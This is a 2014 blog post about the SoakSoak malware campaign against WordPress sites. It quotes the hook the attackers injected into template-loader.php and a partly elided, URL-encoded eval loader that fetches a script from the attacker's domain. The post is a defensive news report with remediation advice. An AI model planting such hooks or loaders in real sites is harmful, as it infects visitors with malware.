Dec 152014
 

Sorry folks, it’s not just big corporations like Staples, Sony, Target etc that are being attacked by rogue elements.

Several 100,000 WordPress sites, including presumably many belonging to average Joes, have been infected with a Javascript malware seeded by SoakSoak.ru, according to security services provider Sucuri.

The malware causes malicious software to be downloaded to a visitor’s computer.

WordPress is used by individuals, small businesses (restaurants, publishers, contractors etc) and non-profits to run blogs and web sites.

The attack from SoakSoak.ru is said to have prompted Google to blacklist over 11,000 domains. Being bbacklisted by Google is often a kiss of death to a small business or non-profit.

Soak.Soak Malware

Sucuri’s preliminary analysis shows correlation between the new malware and the Revslider vulnerability incidents from September 2014.

The SoakSoak malware modifies the file wp-includes/template-loader.php and includes the following content:

function FuncQueueObject()
{
wp_enqueue_script(“swfobject”);
}
add_action(“wp_enqueue_scripts”, ‘FuncQueueObject’);

This supposedly causes wp-includes/js/swobject.js to be loaded on every page on the site with the below malware:

eval(decodeURIComponent
(“%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B”));

Security experts have found that the malware when decoded loads a javascript malware from the SoakSoack.ru domain, specifically this file: hxxp://soaksoak.ru/xteas/code

Currently, the best fix for the SoakSoak malware is to replace the infected files with clean copies or ideally with a fresh WordPress install.

You can check if your favorite WordPress site has malware by using Securi’s free scanner.

Sorry, the comment form is closed at this time.